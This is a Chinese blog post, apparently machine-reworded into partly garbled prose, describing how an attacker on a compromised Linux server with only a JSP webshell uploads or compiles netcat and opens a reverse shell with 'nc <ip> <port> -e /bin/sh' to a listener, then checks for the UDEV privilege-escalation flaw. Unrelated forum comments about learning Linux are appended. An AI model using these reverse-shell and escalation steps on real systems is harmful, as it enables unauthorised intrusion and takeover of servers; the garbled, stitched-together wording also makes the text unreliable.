linux教程之Linux下经由过程WebShell反弹CmdLine Shell小技能

只要了解了Linux的基础之后，应该就可以很轻易的解决掉这方面的问题。而有些朋友们常常一接触Linux就是希望构架网站，根本没有想到要先了解一下Linux的基础。这是相当困难的。
(今天又不当心搜到篇本人之前写的文章，转了良多中央，没见一个写版权的)
昨晚(应当是明天清晨)玩了半天伴侣给的Linux的WebShell，原本想理论一下UDEV提权呢，最初发明服务器貌似已打过补钉了。
不外仍是有其他的劳绩的，以是我就YY下Linux反弹shell的成绩。
Linux提权尽年夜部分都靠的是LocalExploit。WebShell一样平常都能够实行命令，可是我们的EXP必需在可交互情况运转，不然假如间接在WebShell实行，即便能提权乐成，我们也没法使用到。以是我们必要先反弹一个CmdLineShell返来(间接说成CmdShell怕人曲解...由于Win有个cmd.exe^_^)，然后在命令行终端下实行EXP举行提权。
一样平常情形下，尽年夜多半人城市经由过程PHPWebShell的BackConnect功效弹回一个Shell，可是偶然候会碰着服务器不撑持PHP大概WebShell没法反弹的情形，好比这两天伴侣给我的一个JSPShell地点服务器只撑持JSP，不撑持PHP。这时候候，我们典范的netcat就能够派上用处了。
平常在Windows下办事的时分，在需要的情形下我们能够先在本机运转nc-vv-lp1234监听端口，然后在肉鸡上nc12.21.12.211234-ecmd.exe给我们反弹一个CmdShell，这个办法在Linux仍旧可行。
在本机监听后，在WebShell运转nc12.21.12.211234-e/bin/sh就可以弹一个CmdLineShell给我们。
但我们常常碰着的情形其实不都是这么100%顺遂的，像昨晚整的那两台，每台都是不克不及间接实行nc的。一台有nc，但实行从是不起感化，别的一台间接压根就没有nc....
不外，这个难不倒我们，我们能够给他装一个嘛，对照快速的办法是，我们能够到http://netcat.sourceforge.net/download.php下载nc的源码，先在我们本人linux呆板上编译好今后把bin文件传上往(我入手下手传的我的Debian自带的netcat，了局仍旧不克不及运转....)。假如还不可，那就把源码传上往，在方针呆板上间接编译。
昨晚那两台呆板，一台我是间接传的当地编译后的，一台是在方针呆板上编译的。假如间接传的nc能够运转的话还对照好说，假如必要在方针呆板上编译的话，这里有点小技能:
由于在失掉CmdLineShell前，我们只能在WebShell里实行命令，一样平常每次只能实行一条，然后等回显。假设我们的WebShell在/var/www/site目次，那末我们每次实行命令默许确当前路径都是/var/www/site，而我们的netcat源码包解压在了/tmp/netcatsrc文件夹，如许的话，我们编译netcat的时分，configure还好说，可用/tmp/netcatsrc/configure命令，但下一步make的时分就不可了，由于以后路径是/var/www/site，而不是我们想要的/tmp/netcatsrc/，以是我们configure完了make的时分会报错。
办理这个成绩实在也很复杂，能够间接把两句写成一句就能够:cd/tmp/netcatsrc;make
用分号离隔写，把make跟在目次切换命令前面，如许编译的时分就不会报错了。(流离猫教的..^_^)
在还没有失掉CmdLineShell的时分，如许的写法仍是很有效的。
<Palign=centerforimg="1">

登录/注册后可看大图

编译乐成今后，我们就能够输出命令反弹Shell了(好比我这里nc路径是/tmp/nc):
当地nc-vv-lp80后
/tmp/nc202.xx.xx.25080-e/bin/sh就能够给我吗弹返来一个CmdLineShell。
效果以下图:

登录/注册后可看大图

----------------

登录/注册后可看大图

要注重反弹的LinuxShell是没有$提醒符的哦，实行一句前往一句。
另有一点就是这里反弹Shell的时分我运转的是/bin/sh，固然运转/bin/bash也能够。
不外我以为最好仍是运转/bin/sh吧，由于/bin/sh的权限比/bin/bash放的更开一些
特地说一下怎样判别方针是不是有UDEV这个毛病。
Linux我还不晓得怎样检察它是不是打过这个补钉，以是我想了个对照复杂的举措:
1.实行cat/proc/net/netlink,纪录下PIDA
2.实行psaux|grepudev,记下root的PIDB
3.假如A=B-1，则存在毛病，不然不存在
这是我本人想的，由于取得PID的时分有这两种办法，以是我经由过程他们对照来判别，但我其实不能断定我这办法是100%准确的，仅供参考。
效果以下图:
在反弹的Shell里实行，发明失掉的PID纷歧样,2487!=1230

登录/注册后可看大图

12下一页

看不懂man文档的人.在linux中,命令可分为系统基本命令和应用程序命令.系统基本命令是所有的unix类系统都支持的命令,走到哪都不变,只要是unix类系统上就肯定有.

每一个开发团队都对他的发行版做过测试后放出的.那些国际知名的大品牌更是如此。
在我本人呆板上，PID一样，1184=1185-1

登录/注册后可看大图

</p>

上一页12

功能实在太强了,在配合exec参数或者通过管道重定向到xargs命令和grep命令,可以完成非常复杂的操作,如果同样的操作用图形界面的工具来完成,恐怕要多花十几陪的时间。

仓酷云

熟悉系统的基本操作，Linux的图形界面直观，操作简便，多加上机练习就可熟悉操作，在Linux下学习办公软件等常用软件。

尽量不要提问纯属是扯蛋.学习Linux特别是自己一个人初学入手的时候没人教很困难.当然如果可以的话平时多去买些Linux书...对学习Linux很有帮助.

我们这一代90后，从小接触的是windows98，家里条件好的自己有电脑装的是2000，后来又有了XP，上大学时又有了win7。

熟读写基础知识，学得会不如学得牢。

生成新的unispimsp.ksc。”另外得到回复后如果问题解决，向帮助过你的人发个说明，让他们知道问题是怎样解决的。

选择交流平台，如QQ群，网站论坛等。

感谢老师和同学们在学习上对我的帮助。